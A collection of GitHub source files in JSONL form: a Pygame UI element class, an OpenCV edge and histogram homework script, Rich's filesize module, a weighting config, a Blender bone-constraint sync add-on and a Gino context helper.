False, False\n if 'mirrored' in tr_tile:\n mirrored = tr_tile['mirrored'] # horisontal\n if 'flipped' in tr_tile:\n flipped = tr_tile['flipped'] # vertical\n image = pygame.transform.flip(image, mirrored, flipped)\n rect = image.get_rect()\n\n for x, y in tr_tile['positions']:\n rect.topleft = round(x * self.gameboard.square_width + self.x), round(y * self.gameboard.square_height + self.y)\n # print(rect.topleft, self.gameboard.player_char.x, self.gameboard.player_char.y)\n self.screen.blit(pygame.transform.scale(image, (\n round(tr_tile['width'] * self.gameboard.square_width),\n round(tr_tile['height'] * self.gameboard.square_height))), rect)\n\n for text in self.uielement['textobj_list']:\n if text.visible:\n text.blitme(self.x, self.y)\n for text in self.uielement['dyn_textobj_dict'].values():\n if text.visible:\n text.blitme(self.x, self.y)\n","repo_name":"Sprottenfraulein/IHHAB","sub_path":"class_UIElement.py","file_name":"class_UIElement.py","file_ext":"py","file_size_in_byte":11474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"12959595071","text":"import numpy as np\nimport cv2\n\n\ndef get_histograms():\n histograms = np.empty(512)\n bins = np.array(range(512))\n inds = np.digitize((np.array(range(581)) * 0.882), bins) - 1\n for filename in os.listdir('../images/ST2MainHall4'):\n print(filename)\n img = cv2.imread('./images/ST2MainHall4/' + filename, 1).astype(int)\n # apply formula [(r/32) ∗ 64 + (g/32) ∗ 8 + b/32]. Max index is 580\n indices = ((img[:, :, 2] << 1) + (img[:, :, 1] >> 2) + (img[:, :, 0] >> 5)).ravel()\n histogram = np.zeros(512)\n counts = np.bincount(indices)\n # map indices from 0 to 580 into the 512 bins\n for i in range(np.shape(counts)[0]):\n histogram[inds[i]] += counts[i]\n histograms = np.vstack([histograms, histogram])\n return histograms[1:]\n\n\ngray_img = cv2.imread('../images/ST2MainHall4/ST2MainHall4001.jpg', 0)\nimg = cv2.imread('../images/ST2MainHall4/ST2MainHall4001.jpg', 1)\nblues = img[:, :, 0]\ngreens = img[:, :, 1]\nreds = img[:, :, 2]\ngray_edges = cv2.Canny(gray_img, 100, 200) == 0\nblue_edges = cv2.Canny(blues, 100, 200) == 0\nred_edges = cv2.Canny(reds, 100, 200) == 0\ngreen_edges = cv2.Canny(greens, 100, 200) == 0\nsobelX_gray = cv2.Sobel(gray_img,cv2.CV_64F,1,0,ksize=5)\nsobelY_gray = cv2.Sobel(gray_img,cv2.CV_64F,0,1,ksize=5)\nsobelX_blue = cv2.Sobel(blues,cv2.CV_64F,1,0,ksize=5)\nsobelY_blue = cv2.Sobel(blues,cv2.CV_64F,0,1,ksize=5)\nsobelX_red = cv2.Sobel(reds,cv2.CV_64F,1,0,ksize=5)\nsobelY_red = cv2.Sobel(reds,cv2.CV_64F,0,1,ksize=5)\nsobelX_green = cv2.Sobel(greens,cv2.CV_64F,1,0,ksize=5)\nsobelY_green = cv2.Sobel(greens,cv2.CV_64F,0,1,ksize=5)\nsobelX_gray[gray_edges] = 0\nsobelY_gray[gray_edges] = 0\nsobelX_blue[blue_edges] = 0\nsobelY_blue[blue_edges] = 0\nsobelX_red[red_edges] = 0\nsobelY_red[red_edges] = 0\nsobelX_green[green_edges] = 0\nsobelY_green[green_edges] = 0\ncv2.imshow('img', sobelX_gray)\ncv2.imshow('edges', sobelX_gray)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"jchoi34/CS682","sub_path":"jchoi34_hw3.py","file_name":"jchoi34_hw3.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"12680687804","text":"# coding: utf-8\n\"\"\"Functions for reporting filesizes. Borrowed from https://github.com/PyFilesystem/pyfilesystem2\n\nThe functions declared in this module should cover the different\nuse cases needed to generate a string representation of a file size\nusing several different units. Since there are many standards regarding\nfile size units, three different functions have been implemented.\n\nSee Also:\n * `Wikipedia: Binary prefix `_\n\n\"\"\"\n\n__all__ = [\"decimal\"]\n\nfrom typing import Iterable, List, Optional, Tuple\n\n\ndef _to_str(\n size: int,\n suffixes: Iterable[str],\n base: int,\n *,\n precision: Optional[int] = 1,\n separator: Optional[str] = \" \",\n) -> str:\n if size == 1:\n return \"1 byte\"\n elif size < base:\n return \"{:,} bytes\".format(size)\n\n for i, suffix in enumerate(suffixes, 2): # noqa: B007\n unit = base**i\n if size < unit:\n break\n return \"{:,.{precision}f}{separator}{}\".format(\n (base * size / unit),\n suffix,\n precision=precision,\n separator=separator,\n )\n\n\ndef pick_unit_and_suffix(size: int, suffixes: List[str], base: int) -> Tuple[int, str]:\n \"\"\"Pick a suffix and base for the given size.\"\"\"\n for i, suffix in enumerate(suffixes):\n unit = base**i\n if size < unit * base:\n break\n return unit, suffix\n\n\ndef decimal(\n size: int,\n *,\n precision: Optional[int] = 1,\n separator: Optional[str] = \" \",\n) -> str:\n \"\"\"Convert a filesize in to a string (powers of 1000, SI prefixes).\n\n In this convention, ``1000 B = 1 kB``.\n\n This is typically the format used to advertise the storage\n capacity of USB flash drives and the like (*256 MB* meaning\n actually a storage capacity of more than *256 000 000 B*),\n or used by **Mac OS X** since v10.6 to report file sizes.\n\n Arguments:\n int (size): A file size.\n int (precision): The number of decimal places to include (default = 1).\n str (separator): The string to separate the value from the units (default = \" \").\n\n Returns:\n `str`: A string containing a abbreviated file size and units.\n\n Example:\n >>> filesize.decimal(30000)\n '30.0 kB'\n >>> filesize.decimal(30000, precision=2, separator=\"\")\n '30.00kB'\n\n \"\"\"\n return _to_str(\n size,\n (\"kB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\"),\n 1000,\n precision=precision,\n separator=separator,\n )\n","repo_name":"Textualize/rich","sub_path":"rich/filesize.py","file_name":"filesize.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":45508,"dataset":"github-code","pt":"39"}
+{"seq_id":"2711996967","text":"# -*- coding: UTF-8 -*-\n#activeness weight dict used by evaluate_index.py\nactiveness_weight_dict = {'activity_time':0.3, 'activity_geo':0.2, 'statusnum':0.5}\n#importance weight dict\nimportance_weight_dict = {'fansnum':0.3, 'retweeted_num':0.3, 'domain':0.2, 'topic':0.2}\n#topic weight dict\ntopic_weight_dict = {'政治':0.3, '军事':0.15, '社会':0.15, '环境':0.05, \\\n '医药':0.05, '经济':0.05, '交通':0.05, '教育':0.05, \\\n '计算机':0.05, '艺术':0.05, '体育':0.05}\n#domain weight dict\ndomain_weight_dict = {'文化':0.3, '媒体':0.3, '财经':0.1, '教育':0.1, \\\n '科技':0.05, '娱乐':0.05, '时尚':0.05, '体育':0.05}\n","repo_name":"lcwy220/sensitive_user_portrait","sub_path":"sensitive_user_portrait/cron/attribute/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"17917421181","text":"#!BPY\n# -*- coding: UTF-8 -*-\n# sync_bone_constraints\n#\n# Sync Armature's bone's constraints\n# And Sync bone's Inverse Kinematics Settings\n# 2018.06.06 N(Natukikazemizo)\n\nif \"bpy\" in locals():\n import imp\n imp.reload(utils_io_csv)\n imp.reload(bone_constraints)\n imp.reload(common)\nelse:\n from . import utils_io_csv\n from . import bone_constraints\n from . import common\n\nimport bpy\nimport re\n\nclass StringValGroup(bpy.types.PropertyGroup):\n string_val = bpy.props.StringProperty()\n\nbpy.utils.register_class(StringValGroup)\n\nclass MySettings(bpy.types.PropertyGroup):\n\n# emotion = bpy.props.EnumProperty(\n# name = \"Emotion\",\n# description = \"Select emotion of registration destination.\",\n# items = common.emotions\n# )\n\n# overwrite_data = bpy.props.BoolProperty(\n# name = \"Overwrite Data\",\n# description = \"Enable or disable overwriting of data.\",\n# default = True\n# )\n\n csv_file_name = bpy.props.StringProperty(\n name = \"csv_file_name\",\n description = \"CSV file name.\"\n )\n csv_file_directory = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n\n msg_chk = bpy.props.StringProperty()\n msg_icon = bpy.props.StringProperty()\n\n\n msg_x_miller_chk = bpy.props.StringProperty()\n #msg_x_miller_icon = bpy.props.StringProperty()\n\n # リストで選択されているオブジェクトの名前\n #sel_armaturej= bpy.props.StringProperty()\n\n # 選択されている値が格納されるプロパティ\n sel_armature = bpy.props.StringProperty()\n sel_string_val = bpy.props.StringProperty()\n\n # Drop Downリストに表示される値のリスト\n string_val_list = bpy.props.CollectionProperty(type=bpy.types.StringValGroup)\n\n direction = bpy.props.EnumProperty(\n name = \"Direction\",\n description = \"Select constraints copy dilection.\",\n items = common.directions\n )\n\n def init_val_list(self):\n self.string_val_list.clear()\n for obj in bpy.data.objects:\n if obj.type == 'ARMATURE':\n v = self.string_val_list.add()\n v.string_val = obj.name\n v.name = obj.name\n\n def check(self):\n if self.csv_file_name == \"\":\n self.msg_chk = bpy.app.translations.pgettext(\"Select CSV file.\")\n self.msg_icon = \"ERROR\"\n elif self.sel_armature == \"\":\n self.msg_chk = bpy.app.translations.\\\n pgettext(\"Select target Armature.\")\n self.msg_icon = \"ERROR\"\n else:\n self.msg_chk = \"OK\"\n self.msg_icon = \"INFO\"\n\n\n\n # def check_x_miller(self):\n # self.msg_x_miller_chk = \"OK\"\n # self.msg_x_miller_icon = \"INFO\"\n\n# def update_val(self, nm):\n# for sv in self.string_val_list:\n# if sv.name == nm:\n# self.sel_string_val = sv.string_val\n\nclass SelectCSVFile(bpy.types.Operator):\n\n bl_idname = \"object.select_csv_file\"\n bl_label = bpy.app.translations.pgettext(\"Select CSV File\")\n bl_description = bpy.app.translations.pgettext(\"Select CSV File\")\n bl_options = {'REGISTER', 'UNDO'}\n\n filepath = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n filename = bpy.props.StringProperty(name=\"filename\")\n directory = bpy.props.StringProperty(subtype=\"FILE_PATH\")\n # Search Filter\n filter_glob = bpy.props.StringProperty(\n default=\"*.csv\",\n options={'HIDDEN'}\n )\n\n def execute(self, context):\n self.report(\n {'INFO'},\n \" [FilePath] %s, [FileName] %s, [Directory] %s\"\n % (self.filepath, self.filename, self.directory)\n )\n props = context.window_manager.sync_bone_constraints_props\n props.csv_file_directory = self.directory\n props.csv_file_name = self.filename\n return {'FINISHED'}\n\n def invoke(self, context, event):\n wm = context.window_manager\n # Show File Browser\n wm.fileselect_add(self)\n\n return {'RUNNING_MODAL'}\n\nclass NullOperation(bpy.types.Operator):\n\n bl_idname = \"object.null_operation\"\n bl_label = \"NOP\"\n bl_description = \"何もしない\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n return {'FINISHED'}\n\n#class NullOperationMenu(bpy.types.Menu):\n#\n# bl_idname = \"object.null_operation_menu\"\n# bl_label = \"NOP Menu\"\n# bl_description = \"Menu with multiple processes that do nothing\"\n\n# def draw(self, context):\n# layout = self.layout\n# # メニュー項目の追加\n# for i in range(3):\n# layout.operator(NullOperation.bl_idname, text=(\"項目 %d\" % (i)))\n\nclass SyncBonesIK(bpy.types.Operator):\n\n bl_idname = \"object.sync_bones_ik\"\n bl_label = \"SyncBonesIK\"\n bl_description = \"Sync bones Invese Kinematics Settings.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n props = context.window_manager.sync_bone_constraints_props\n\n fromArmature = bpy.context.object.name\n for x in bpy.data.objects[props.sel_armature].pose.bones:\n if x.name in bpy.data.objects[fromArmature].pose.bones:\n fromBone = bpy.data.objects[fromArmature].pose.bones[x.name]\n x.ik_min_x = fromBone.ik_min_x\n x.ik_min_y = fromBone.ik_min_y\n x.ik_min_z = fromBone.ik_min_z\n x.ik_max_x = fromBone.ik_max_x\n x.ik_max_y = fromBone.ik_max_y\n x.ik_max_z = fromBone.ik_max_z\n x.use_ik_limit_x = fromBone.use_ik_limit_x\n x.use_ik_limit_y = fromBone.use_ik_limit_y\n x.use_ik_limit_z = fromBone.use_ik_limit_z\n x.ik_stretch = fromBone.ik_stretch\n x.lock_ik_x = fromBone.lock_ik_x\n x.lock_ik_y = fromBone.lock_ik_y\n x.lock_ik_z = fromBone.lock_ik_z\n\n return {'FINISHED'}\n\n\n# Sync Bone Constraints\nclass SyncBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.sync_bone_constraints\"\n bl_label = \"Sync\"\n bl_description = \"Sync bones constraints of Armatures.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n ExportBoneConstraints.execute(ExportBoneConstraints, context)\n ImportBoneConstraints.execute(ImportBoneConstraints, context)\n SyncBonesIK.execute(SyncBonesIK, context)\n return {'FINISHED'}\n\nclass ExportBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.export_bone_constraints\"\n bl_label = \"Export\"\n bl_description = \"Export bones constraints to CSV File.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n bone_data = []\n bone_data.append(bone_constraints.BoneConstraints.header)\n\n for x in bpy.context.selected_pose_bones:\n # SKIP Special Bone\n if x.name == \"Controllers_Root\":\n continue\n\n if len(x.constraints) == 0:\n data = bone_constraints.BoneConstraints()\n data.bone_name = x.name\n bone_data.append(data.row)\n\n for y in x.constraints:\n data = bone_constraints.BoneConstraints()\n if y.type == \"TRANSFORM\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n data.extrapolate = y.use_motion_extrapolate\n data.from_min_x = y.from_min_x\n data.from_max_x = y.from_max_x\n data.from_min_y = y.from_min_y\n data.from_max_y = y.from_max_y\n data.from_min_z = y.from_min_z\n data.from_max_z = y.from_max_z\n data.map_to_x_from = y.map_to_x_from\n data.map_to_y_from = y.map_to_y_from\n data.map_to_z_from = y.map_to_z_from\n data.map_to = y.map_to\n\n if y.map_to == \"LOCATION\":\n data.to_min_x = y.to_min_x\n data.to_max_x = y.to_max_x\n data.to_min_y = y.to_min_y\n data.to_max_y = y.to_max_y\n data.to_min_z = y.to_min_z\n data.to_max_z = y.to_max_z\n elif y.map_to == \"ROTATION\":\n data.to_min_x = y.to_min_x_rot\n data.to_max_x = y.to_max_x_rot\n data.to_min_y = y.to_min_y_rot\n data.to_max_y = y.to_max_y_rot\n data.to_min_z = y.to_min_z_rot\n data.to_max_z = y.to_max_z_rot\n else:\n # map_to:SCALE\n data.to_min_x = y.to_min_x_scale\n data.to_max_x = y.to_max_x_scale\n data.to_min_y = y.to_min_y_scale\n data.to_max_y = y.to_max_y_scale\n data.to_min_z = y.to_min_z_scale\n data.to_max_z = y.to_max_z_scale\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n\n bone_data.append(data.row)\n elif y.type == \"COPY_LOCATION\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.from_min_x = y.use_x\n data.from_max_x = y.invert_x\n data.from_min_y = y.use_y\n data.from_max_y = y.invert_y\n data.from_min_z = y.use_z\n data.from_max_z = y.invert_z\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n data.head_tail = y.head_tail\n data.use_offset = y.use_offset\n\n bone_data.append(data.row)\n\n elif y.type == \"COPY_ROTATION\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.from_min_x = y.use_x\n data.from_max_x = y.invert_x\n data.from_min_y = y.use_y\n data.from_max_y = y.invert_y\n data.from_min_z = y.use_z\n data.from_max_z = y.invert_z\n\n data.target_space = y.target_space\n data.owner_space = y.owner_space\n data.influence = y.influence\n data.type = y.type\n data.use_offset = y.use_offset\n\n bone_data.append(data.row)\n\n elif y.type == \"IK\":\n print(x.name + \", \" + y.name)\n\n data.bone_name = x.name\n data.constraint_name = y.name\n data.mute = y.mute\n data.target = y.target.name\n data.subtarget_bone_name = y.subtarget\n\n data.influence = y.influence\n data.type = y.type\n\n data.pole_target = y.pole_target\n data.pole_subtarget = y.pole_subtarget\n data.pole_angle = y.pole_angle\n data.iterations = y.iterations\n data.chain_count = y.chain_count\n data.use_tail = y.use_tail\n data.use_stretch = y.use_stretch\n data.use_location = y.use_location\n data.weight = y.weight\n data.use_rotation = y.use_rotation\n data.orient_weight = y.orient_weight\n\n bone_data.append(data.row)\n\n\n props = context.window_manager.sync_bone_constraints_props\n utils_io_csv.write(props.csv_file_directory,\n props.csv_file_name,\n bone_data)\n return {'FINISHED'}\n\nclass ImportBoneConstraints(bpy.types.Operator):\n\n bl_idname = \"object.import_bone_constraints\"\n bl_label = \"Import\"\n bl_description = \"Import bones constraints from CSV file.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n props = context.window_manager.sync_bone_constraints_props\n target = props.sel_armature\n props = context.window_manager.sync_bone_constraints_props\n header, data = utils_io_csv.read(props.csv_file_directory, \\\n props.csv_file_name)\n\n for row in data:\n if bpy.data.objects.find(target) == -1:\n print(\"Object not found. Object name is \" + target)\n break\n\n con = bone_constraints.BoneConstraints(row)\n\n if bpy.data.objects[target].pose.bones.find(con.bone_name) == -1:\n print(\"Bone not found. Bone name is \" + con.bone_name)\n break\n bone = bpy.data.objects[target].pose.bones[con.bone_name]\n for x in bone.constraints:\n bone.constraints.remove(x)\n\n for row in data:\n\n con = bone_constraints.BoneConstraints(row)\n\n bone = bpy.data.objects[target].pose.bones[con.bone_name]\n\n if con.constraint_name is None or con.constraint_name == \"\":\n continue\n\n if bone.constraints.find(con.constraint_name) == -1:\n constraint = bone.constraints.new(type=con.type)\n constraint.name = con.constraint_name\n\n constraint = bone.constraints[con.constraint_name]\n\n print(\"bone:\" + bone.name + \" constraint:\" + constraint.name)\n\n constraint.mute = con.mute == \"True\"\n constraint.target = bpy.data.objects[target]\n constraint.subtarget = con.subtarget_bone_name\n\n if con.type == \"TRANSFORM\":\n constraint.use_motion_extrapolate = con.extrapolate == \"True\"\n\n constraint.from_min_x = float(con.from_min_x)\n constraint.from_max_x = float(con.from_max_x)\n constraint.from_min_y = float(con.from_min_y)\n constraint.from_max_y = float(con.from_max_y)\n constraint.from_min_z = float(con.from_min_z)\n constraint.from_max_z = float(con.from_max_z)\n\n constraint.map_to_x_from = con.map_to_x_from\n constraint.map_to_y_from = con.map_to_y_from\n constraint.map_to_z_from = con.map_to_z_from\n constraint.map_to = con.map_to\n if constraint.map_to == \"LOCATION\":\n constraint.to_min_x = float(con.to_min_x)\n constraint.to_max_x = float(con.to_max_x)\n constraint.to_min_y = float(con.to_min_y)\n constraint.to_max_y = float(con.to_max_y)\n constraint.to_min_z = float(con.to_min_z)\n constraint.to_max_z = float(con.to_max_z)\n elif constraint.map_to == \"ROTATION\":\n constraint.to_min_x_rot = float(con.to_min_x)\n constraint.to_max_x_rot = float(con.to_max_x)\n constraint.to_min_y_rot = float(con.to_min_y)\n constraint.to_max_y_rot = float(con.to_max_y)\n constraint.to_min_z_rot = float(con.to_min_z)\n constraint.to_max_z_rot = float(con.to_max_z)\n else:\n # map_to:SCALE\n constraint.to_min_x_scale = float(con.to_min_x)\n constraint.to_max_x_scale = float(con.to_max_x)\n constraint.to_min_y_scale = float(con.to_min_y)\n constraint.to_max_y_scale = float(con.to_max_y)\n constraint.to_min_z_scale = float(con.to_min_z)\n constraint.to_max_z_scale = float(con.to_max_z)\n elif con.type == \"COPY_LOCATION\":\n constraint.use_x = con.from_min_x == \"True\"\n constraint.invert_x = con.from_max_x == \"True\"\n constraint.use_y = con.from_min_y == \"True\"\n constraint.invert_y = con.from_max_y == \"True\"\n constraint.use_z = con.from_min_z == \"True\"\n constraint.invert_z = con.from_max_z == \"True\"\n constraint.head_tail = float(con.head_tail)\n constraint.use_offset = con.use_offset\n elif con.type == \"COPY_ROTATION\":\n constraint.use_x = con.from_min_x == \"True\"\n constraint.invert_x = con.from_max_x == \"True\"\n constraint.use_y = con.from_min_y == \"True\"\n constraint.invert_y = con.from_max_y == \"True\"\n constraint.use_z = con.from_min_z == \"True\"\n constraint.invert_z = con.from_max_z == \"True\"\n constraint.use_offset = con.use_offset\n\n if con.type == \"TRANSFORM\" or con.type == \"COPY_LOCATION\" or \\\n con.type == \"COPY_ROTATION\":\n constraint.target_space = con.target_space\n constraint.owner_space = con.owner_space\n\n constraint.influence = con.influence\n\n if con.type == \"IK\":\n if con.pole_target != \"\":\n constraint.pole_target = bpy.data.objects[target]\n if con.pole_subtarget != \"\":\n constraint.pole_subtarget = con.pole_subtarget\n constraint.pole_angle = con.pole_angle\n constraint.iterations = con.iterations\n constraint.chain_count = con.chain_count\n constraint.use_tail = con.use_tail\n constraint.use_stretch = con.use_stretch\n constraint.use_location = con.use_location\n constraint.weight = con.weight\n constraint.use_rotation = con.use_rotation\n constraint.orient_weight = con.orient_weight\n\n return {'FINISHED'}\n\n\nclass XMillerTransformations(bpy.types.Operator):\n\n bl_idname = \"object.x_miller_transformations\"\n bl_label = \"XMillerTransformations\"\n bl_description = \"X-Axis Miller Bone Transformation constraings.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n\n props = context.window_manager.sync_bone_constraints_props\n\n props.msg_x_miller_chk = bpy.app.translations.pgettext(\"Start.\")\n\n if props.direction == \"l2r\":\n key = r\"\\.L($|\\.|_)\"\n other_side = \"R\"\n else:\n key = r\"\\.R($|\\.|_)\"\n other_side = \"L\"\n\n for x in bpy.context.selected_pose_bones:\n\n # SKIP Other side & Center bones\n if re.search(key, x.name) is None:\n continue\n\n print(re.search(key, x.name) == False)\n\n if len(x.constraints) == 0:\n continue\n\n for y in x.constraints:\n if y.type == \"TRANSFORM\":\n print(x.name + \", \" + y.name)\n\n # search other side bone & constraint\n other_side_bone_name =\\\n common.get_otherside_name(key, other_side, x.name)\n\n if re.search(key, y.subtarget) is None:\n continue\n\n other_side_tgt_name =\\\n common.get_otherside_name(key, other_side, y.subtarget)\n\n x2 = x.id_data.pose.bones[other_side_bone_name]\n y2 = x2.constraints[y.name]\n\n\n # data.bone_name = x.name\n # data.constraint_name = y.name\n y2.mute = y.mute\n # y2.target = y.target.name\n y2.subtarget = other_side_tgt_name\n y2.use_motion_extrapolate = y.use_motion_extrapolate\n y2.from_min_x = y.from_min_x\n y2.from_max_x = y.from_max_x\n y2.from_min_y = y.from_min_y\n y2.from_max_y = y.from_max_y\n y2.from_min_z = y.from_min_z\n y2.from_max_z = y.from_max_z\n y2.map_to_x_from = y.map_to_x_from\n y2.map_to_y_from = y.map_to_y_from\n y2.map_to_z_from = y.map_to_z_from\n y2.map_to = y.map_to\n\n if y.map_to == \"LOCATION\":\n y2.to_min_x = y.to_min_x\n y2.to_max_x = y.to_max_x\n y2.to_min_y = y.to_min_y\n y2.to_max_y = y.to_max_y\n y2.to_min_z = y.to_min_z\n y2.to_max_z = y.to_max_z\n elif y.map_to == \"ROTATION\":\n y2.to_min_x_rot = y.to_min_x_rot\n y2.to_max_x_rot = y.to_max_x_rot\n y2.to_min_y_rot = y.to_min_y_rot\n y2.to_max_y_rot = y.to_max_y_rot\n y2.to_min_z_rot = y.to_min_z_rot\n y2.to_max_z_rot = y.to_max_z_rot\n else:\n # map_to:SCALE\n y2.to_min_x_scale = y.to_min_x_scale\n y2.to_max_x_scale = y.to_max_x_scale\n y2.to_max_y_scale = y.to_max_y_scale\n y2.to_min_y_scale = y.to_min_y_scale\n y2.to_min_z_scale = y.to_min_z_scale\n y2.to_max_z_scale = y.to_max_z_scale\n\n y2.target_space = y.target_space\n y2.owner_space = y.owner_space\n y2.influence = y.influence\n # y2.type = y.type\n\n props.msg_x_miller_chk = bpy.app.translations.pgettext(\"Finished.\")\n\n return {'FINISHED'}\n\n\n\n# Add \"Auto Breakdown\" tab on Tool Shelf\nclass VIEW3D_PT_AutoBreakdown(bpy.types.Panel):\n\n bl_label = bpy.app.translations.pgettext(\"Sync Bone Constraints\")\n # String on TAB\n bl_space_type = 'VIEW_3D' # Area which show menu\n bl_region_type = 'TOOLS' # Region which show menu\n bl_category = bpy.app.translations.pgettext(\"Auto Breakdown\")\n # String displayed in the header of the menu that opened the tab\n bl_context = \"posemode\" # Context which show panel\n\n # 本クラスの処理が実行可能かを判定する\n @classmethod\n def poll(cls, context):\n # オブジェクトが選択されている時のみメニューを表示させる\n for o in bpy.data.objects:\n if o.select:\n return True\n return False\n\n # ヘッダーのカスタマイズ\n def draw_header(self, context):\n layout = self.layout\n layout.label(text=\"\", icon='PLUGIN')\n\n # メニューの描画処理\n def draw(self, context):\n layout = self.layout\n scene = context.scene\n props = context.window_manager.sync_bone_constraints_props\n\n\n # ファイルブラウザを表示する\n layout.label(text = props.csv_file_directory)\n layout.label(text = props.csv_file_name)\n layout.operator(SelectCSVFile.bl_idname)\n\n# # CharacterName\n# layout.label(text = bpy.app.translations.pgettext(\"Character Name:\"))\n# layout.label(text = bpy.path.abspath(\"//\"))\n\n# # display the properties\n# layout.prop(props, \"emotion\", \\\n# text=bpy.app.translations.pgettext(\"Emotion\"))\n\n# layout.separator()\n\n# layout.prop(props, \"overwrite_data\", \\\n# text=bpy.app.translations.pgettext(\"Overwrite Data\"))\n\n\n# layout.prop_search(props, \"sel_obj\", context.scene, \\\n# \"objects\", text=\"Objects\")\n# row = layout.row()\n# row.prop_search(props, \"sel_obj\", context.scene, \"objects\", text=\"Objects\")\n# row = layout.row()\n# row.prop(props, \"sel_obj\")\n\n row = layout.row()\n\n props.init_val_list()\n\n row.prop_search(props, \"sel_armature\", props,\n \"string_val_list\",\n text = bpy.app.translations.pgettext(\"Target\"),\n icon=\"OUTLINER_OB_ARMATURE\")\n\n# row = layout.row()\n# row.prop(props, \"sel_armature\")\n\n # props.update_val(props.sel_armature)\n# row.prop(props, \"sel_string_val\")\n\n layout.separator()\n\n row = layout.row()\n box = row.box()\n box_row = box.row()\n\n props.check()\n\n box_row.label(text = props.msg_chk, icon=props.msg_icon)\n\n layout.operator(SyncBoneConstraints.bl_idname, \\\n text = bpy.app.translations.pgettext(\"Sync\"))\n\n# layout.separator()\n\n# layout.operator(ExportBoneConstraints.bl_idname, \\\n# text = bpy.app.translations.pgettext(\"Write CSV\"))\n\n# layout.separator()\n\n# layout.operator(ImportBoneConstraints.bl_idname, \\\n# text = bpy.app.translations.pgettext(\"Read CSV\"))\n\n# layout.separator()\n\n# layout.operator(SyncBonesIK.bl_idname, \\\n\n\n# Add X-Miller Function Panel\nclass VIEW3D_PT_XMiller(bpy.types.Panel):\n\n bl_label = bpy.app.translations.pgettext(\"X-Miller Bone Transformations\")\n # String on TAB\n bl_space_type = 'VIEW_3D' # Area which show menu\n bl_region_type = 'TOOLS' # Region which show menu\n bl_category = bpy.app.translations.pgettext(\"Auto Breakdown\")\n # String displayed in the header of the menu that opened the tab\n bl_context = \"posemode\" # Context which show panel\n\n # 本クラスの処理が実行可能かを判定する\n @classmethod\n def poll(cls, context):\n # オブジェクトが選択されている時のみメニューを表示させる\n for o in bpy.data.objects:\n if o.select:\n return True\n return False\n\n # ヘッダーのカスタマイズ\n def draw_header(self, context):\n layout = self.layout\n layout.label(text=\"\", icon='PLUGIN')\n\n # メニューの描画処理\n def draw(self, context):\n layout = self.layout\n scene = context.scene\n props = context.window_manager.sync_bone_constraints_props\n\n\n layout.prop(props, \"direction\", \\\n text=bpy.app.translations.pgettext(\"direction\"))\n\n layout.separator()\n\n row = layout.row()\n box = row.box()\n box_row = box.row()\n\n # props.check_x_miller()\n\n box_row.label(text = props.msg_x_miller_chk, icon=\"NONE\")\n\n layout.operator(XMillerTransformations.bl_idname, \\\n text = bpy.app.translations.pgettext(\"Copy\"))\n\n# text = bpy.app.translations.pgettext(\"Sync IK\"))\n","repo_name":"natukikazemizo/Sedna1.0","sub_path":"src/python/addons/animation_auto_breakdown/sync_bone_constraints.py","file_name":"sync_bone_constraints.py","file_ext":"py","file_size_in_byte":27340,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"}
+{"seq_id":"12143731526","text":"from contextvars import ContextVar\nfrom typing import Type, TypeVar\n\nfrom gino import Gino\n\n\n__all__ = \"ContextGino\",\n\nT = TypeVar(\"T\")\n\n\nclass ContextGino(Gino):\n \"\"\"\n For context bind, and pool.\n usage is simple\n just ContextGino.get_current() but only in functions, and something lke this\n and you should ready for atack of gino engine instance\n but take care about global \"GINO\"'s\n like that globals may raise huge problems\n \"\"\"\n # unfortunetly, variant of\n # using with ContextInstanceMixin from aiogram\n # not working\n __context_instance = ContextVar(\"context_gino\")\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.set_current(ContextGino)\n\n @classmethod\n def get_current(cls: Type[T], no_error: bool = True) -> T:\n try:\n ctx = cls.__context_instance.get()\n except LookupError:\n if no_error:\n return\n raise\n else:\n return ctx\n\n @classmethod\n def set_current(cls: Type[T], value: T) -> None:\n assert not isinstance(value, cls), \\\n f'Value should be instance of {cls.__name__!r} not {type(value).__name__!r}'\n cls.__context_instance.set(value)\n","repo_name":"pikoUsername/authboi","sub_path":"iternal/store/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
